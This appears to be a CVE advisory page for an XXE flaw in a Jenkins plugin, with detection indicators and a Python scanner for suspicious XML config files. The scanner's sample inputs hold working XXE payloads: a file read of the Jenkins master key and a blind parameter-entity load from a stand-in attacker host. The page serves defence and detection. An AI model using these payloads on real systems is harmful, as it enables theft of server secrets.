CVE-2021-21642
published 2021-04-21

CVE-2021-21642: Jenkins Config File Provider Plugin 3.7.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

Priority: P2 (61)
CVSS 3.1: 8.1 High
Vector: AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:N
EPSS: 37.83% (98.4th percentile)

Affected (7 ranges)

Vendor           Product                               Version range         Fixed in
jenkins          cloudbees_cd_plugin                   -                     -
jenkins          config_file_provider                  <= 3.7.0              -
jenkins          config_file_provider_plugin           -                     -
jenkins          ids_in_config_file_provider_plugin    -                     -
jenkins          script_security_plugin                -                     -
jenkins          templating_engine_plugin              -                     -
jenkins_project  jenkins_config_file_provider_plugin   unspecified – 3.7.0   -

Detection & IOCs (extracted from sources)

  • An attacker must be able to define Maven configuration files in Jenkins to exploit this XXE vulnerability; monitor for unexpected or newly created Maven config files managed by the Config File Provider Plugin, and review which users and roles hold that permission.
  • The attack vector is a crafted XML configuration file containing external entity declarations; inspect Maven configuration files managed by the plugin for XXE payloads (a DOCTYPE declaration, SYSTEM or PUBLIC entity references, or parameter entities such as <!ENTITY % x SYSTEM "...">). A Maven settings.xml has no legitimate need for a DOCTYPE at all, so any DOCTYPE in these files warrants review.
  • Outbound DNS or HTTP requests originating from the Jenkins controller process may indicate XXE-based SSRF or out-of-band secret exfiltration exploiting this vulnerability.
  • Affected versions are Config File Provider Plugin 3.7.0 and earlier; in these versions the XML parser is not configured to prevent XXE attacks.
  • Red Hat has identified no practical mitigation short of patching; upgrading the plugin is the only recommended remediation.
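
The following scanner is an added example, not code from this page or from the Jenkins project: it applies the indicators listed above to XML config files, such as the Maven settings.xml files the Config File Provider Plugin stores, and reports DOCTYPE declarations, SYSTEM/PUBLIC (external) entities and parameter entities. It uses only the Python standard library; expat reports the declarations without fetching anything because no ExternalEntityRefHandler is installed. The three sample files (benign, classic file-read XXE, blind parameter-entity XXE), the paths and the attacker.invalid hostname are constructed for the example.

```python
"""Scan XML configuration files for XXE indicators (added example, not project code)."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
from xml.parsers import expat


@dataclass
class XxeFindings:
    has_doctype: bool = False
    external_dtd: Optional[str] = None  # SYSTEM/PUBLIC id on the DOCTYPE itself
    external_entities: List[Tuple[str, str]] = field(default_factory=list)  # (name, URI)
    parameter_entities: List[str] = field(default_factory=list)
    internal_entities: List[str] = field(default_factory=list)
    parse_error: Optional[str] = None

    @property
    def reasons(self) -> List[str]:
        """Why the file looks like an XXE payload; empty for a clean file."""
        out = []
        if self.external_dtd:
            out.append(f"DOCTYPE loads external DTD {self.external_dtd}")
        for name, uri in self.external_entities:
            out.append(f"external entity {name!r} -> {uri}")
        if self.parameter_entities:
            out.append("parameter entities: " + ", ".join(self.parameter_entities))
        if self.has_doctype and not out:
            # settings.xml never needs a DOCTYPE, so even a harmless one is worth a look
            out.append("DOCTYPE present in a file format that does not use one")
        return out

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def scan_xml(text: str) -> XxeFindings:
    """Parse with expat and record DTD/entity declarations. No external entity
    handler is installed, so SYSTEM/PUBLIC references are reported, never fetched."""
    findings = XxeFindings()
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.has_doctype = True
        findings.external_dtd = sysid or pubid

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if is_param:
            findings.parameter_entities.append(name)
        if sysid or pubid:
            findings.external_entities.append((name, sysid or pubid))
        elif not is_param:
            findings.internal_entities.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(text, True)
    except expat.ExpatError as exc:
        findings.parse_error = str(exc)  # malformed files are still reported, not hidden
    return findings


def triage(configs: Dict[str, str]) -> Dict[str, List[str]]:
    """Map config name -> reasons, for suspicious files only."""
    return {name: scan_xml(text).reasons
            for name, text in configs.items() if scan_xml(text).suspicious}


# Constructed sample inputs (hypothetical paths and hostname).
BENIGN = """<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0">
  <localRepository>/var/jenkins_home/.m2/repository</localRepository>
</settings>
"""

CLASSIC_XXE = """<?xml version="1.0"?>
<!DOCTYPE settings [
  <!ENTITY xxe SYSTEM "file:///var/jenkins_home/secrets/master.key">
]>
<settings>
  <localRepository>&xxe;</localRepository>
</settings>
"""

BLIND_XXE = """<?xml version="1.0"?>
<!DOCTYPE settings [
  <!ENTITY % dtd SYSTEM "http://attacker.invalid/evil.dtd">
  %dtd;
]>
<settings/>
"""

if __name__ == "__main__":
    for name, reasons in triage({"benign": BENIGN, "classic": CLASSIC_XXE,
                                 "blind": BLIND_XXE}).items():
        print(name, "->", "; ".join(reasons))
```

Run it over the plugin's stored config files (on the controller, under the Config File Provider Plugin's configuration) and treat any hit as a file to review together with who created or last edited it, since the prerequisite for exploitation is exactly that permission.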

CVSS provenance

NVD, CVSS v3.1: 8.1 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
NVD, CVSS v2.0: 5.5 MEDIUM, AV:N/AC:L/Au:S/C:P/I:P/A:N
Red Hat (vendor): 8.1 HIGH